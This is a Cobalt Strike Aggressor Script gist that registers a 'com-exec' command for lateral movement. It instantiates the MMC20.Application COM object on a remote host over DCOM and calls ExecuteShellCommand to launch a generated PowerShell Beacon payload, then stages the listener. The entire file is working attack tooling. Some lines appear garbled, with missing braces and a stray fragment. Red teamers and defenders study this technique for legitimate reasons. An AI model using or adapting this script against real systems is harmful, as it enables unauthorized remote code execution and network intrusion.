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Forked from rsmudge/comexec.cna
Created January 11, 2017 18:02
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Lateral Movement with the MMC20.Application COM Object (Aggressor Script Alias)
# Lateral Movement alias
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
"Synopsis: com-exec [target] [listener]\n\n" .
"Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
if ($3 is $null) {
# let the user choose a listener
com_exec_go($bid, $target, $1);
}, $bid => $1, $target => $2));
else {
# we have the needed arguments, pass them
com_exec_go($1, $2, $3);
# this is the implementation of the attack
sub com_exec_go {
local('$command $script $oneliner');
# check if our listener exists
if (listener_info($3) is $null) {
berror($1, "Listener $3 does not exist");
# state what we're doing.
btask($1, "Tasked Beacon to jump to $2 (" . listener_describe($3, $2) . ") via DCOM");
# generate a PowerShell one-liner to run our alias
$command = powershell($3, true, "x86");
# remove "powershell.exe " from our command
$command = strrep($command, "powershell.exe ", "");
# build script that uses DCOM to invoke ExecuteShellCommand on MMC20.Application object
$script = '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "';
$script .= $2;
$script .= '")).Document.ActiveView.ExecuteShellCommand("';
$script .= 'c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe';
$script .= '", $null, "';
$script .= $command;
$script .= '", "7")';
# run the script we built up
bpowershell!($1, $script);
# complete staging process (for bind_pipe listeners)
bstage($1, $2, $3);
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